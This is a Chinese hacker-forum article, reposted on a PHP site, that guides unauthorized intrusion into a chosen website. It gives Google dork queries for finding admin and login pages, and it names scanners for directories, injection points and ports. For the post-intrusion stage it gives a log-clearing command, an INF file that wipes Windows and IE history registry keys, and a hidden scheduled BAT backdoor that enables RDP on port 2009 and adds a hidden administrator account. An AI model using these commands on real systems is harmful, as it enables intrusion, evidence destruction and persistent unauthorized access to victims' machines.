当前位置:  首页  >  服务器技术  >  Linux/unix  >  Linux教程

入侵指定网站前的踩点侦察和入侵后的清理痕迹

入侵指定网站前的踩点侦察和入侵后的清理工作:一直很资深在互联网上潜水,但眼见着黑基、黑白、黑吧等铜味越来越重,红鹰、黑鹰的一个一个没落,邪恶警戒线等固步自封,当然要现在急功近利的时代里,黑客论坛到处都是,但看看都是些年少无知的少年拿着个工具
Author:zrz444 转自:3est

一直很资深在互联网上潜水,但眼见着黑基、黑白、黑吧等铜味越来越重,红鹰、黑鹰的一个一个没落,邪恶警戒线等固步自封,当然要现在急功近利的时代里,黑客bbs' target='_blank'>论坛到处都是,但看看都是些年少无知的少年拿着个工具到处横冲直撞,心里很不是滋味。
   去年逛到新兴论坛的华东,偶尔进入了今天的3EST。开始以为也是一些无知少年拿着工具扫来扫去,D来D去,所以连续发了一些黑客工具,但立即被管理员MJJ批评:宁愿要技术,少发或不发工具!且每次发工具或帖子,MJJ都是第一时间有了反应:或删帖,或警告,当然也有加分。MJJ之细心超过我的想象,心中终于有了一个家的感觉:果然也是真正搞技术的地方。
   基于MJJ宁要技术不要工具,所以有此文章,当然作为工具流的我,也只能发些个人粗浅的感受,不当之处大家多批评。

一:入侵前的侦察。
首先打开无界代理(最新版是U995)或VPN(推荐用飞易VPN,但不免杀的,可以简单做一下免杀)再做如下工作:
  第一步:个人感觉,侦察时用来GOOGLE,用以下命令查后台和敏感信息:
site:www.****.com intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|manage|admin|login|system
site:www.*****.com inurl:login|admin|manage|manager|admin_login|login_admin|system
site:www.***.com intitle:管理|后台|登陆|
site:www.****.com intext:验证码
第二步:推荐用TOOLS出品的wwwscan_gui.exe,扫描指定网站目录。这个工具,可以自己DIY里面的字典文件。论坛里有MJJ的社工字典和其他人发的字典工具,都可以加进去。
第三步:用明小子,再次扫描指定网站的注入点、数据库、后台文件。并扫描有没有可能跨站。不要用现成的明小子,自己DIY数据库文件。甚至可以用X-CAN3.0对指定网站的端口如TELNET,FTP扫描。
  第四步:根据以上信息,比如,网站类型,管理员注册信息,端口信息。再次GOOGLE收集网站足够多的信息。

二:入侵一般步骤(忽略:因为论坛MJJ们发的东西足够多也足够技术了,本人不再班门弄斧)

三:入侵后的善后工作。

   毫无疑问的是三个字:别装B!
第一:别挂黑页,那是小孩子做的事,如果真要挂黑的话,不留下QQ号等个人信息,个人认为这是很重要的事。
第二:清理痕迹:建议用两个工具一是AIO,个人发现,现在的肉鸡上执行命令越来越难了,这个工具执行命令也难多了,但是清理痕迹功能始终很好,很强大。用法: 路径Aio.exe -CleanLog
  另一个工具是微软自带的psloglist.exe,这个软件始终不会被杀,也很好很强大,用法,用法可以命令行下/?一下。
第三用如下方法清理一下上网的痕迹,因为毕竟我们有时会用肉鸡上一下网等等的。
   [version]
signature=$CHICAGO$
[Defaultinstall]
delreg=deleteme
addreg=addme
[deleteme]
hkcu,softwaremicrosoftinternet explorertypedurls
hkcu,SoftwareMicrosoftWindowsCurrentVersionAppletsPaintrecent file list
hkcu,SoftwareMicrosoftWindowsCurrentVersionexplorerfindcomputermru
hkcu,SoftwareMicrosoftWindowsCurrentVersionexplorerprnportsmru
hkcu,SoftwareMicrosoftWindowsCurrentVersionexplorerrecentdocs
hkcu,SoftwareMicrosoftWindowsCurrentVersionexplorerrunmru
hkcu,SoftwareMicrosoftWindowsCurrentVersionexplorerstreammru
hkcu,SoftwareMicrosoftWindowsCurrentVersionexplorerstreams
将以上内容保存为 inf 文件 再在此文件点右键安装 即可清除痕迹了,INF文件放于C下,也不易发现。

第四:做下后门,毕竟象SHIFT后门容易让人发现也不强大,所以我们不如直接用BAT作入系统计划任务中:代码如下:

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f        //开启终端服务

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp /v PortNumber /t REG_DWORD /d 0x7d9 /f    //改为2009连接终端

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp /v PortNumber /t REG_DWORD /d 0x7d9 /f    //改为2009连接终端

net user 444 000123 /add
net localgroup administrators 444 /add

以上成为一个BAT文件,然后属性改为隐藏,放入系统计划中。定时运行。当然用这个之前必须看看它的AT服务开了没有,如没有用以下命令执行:
sc config   Schedule start= auto     net start schedule
当然,直接进入服务改更好便当。

   以上是本人对指定网站入侵的侦察和善后常做工作,和大家交流一下,很想听听你们是怎么做的。
吐了个 "CAO" !
扫码关注 PHP1 官方微信号
PHP1.CN | 中国最专业的PHP中文社区 | 凯发国际娱乐 | 凯发国际娱乐下载 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | PHP问答
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved PHP1.CN 第一PHP社区 版权所有